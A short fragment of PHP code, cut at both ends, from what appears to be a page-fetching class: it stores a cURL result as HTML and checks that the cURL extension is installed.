curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>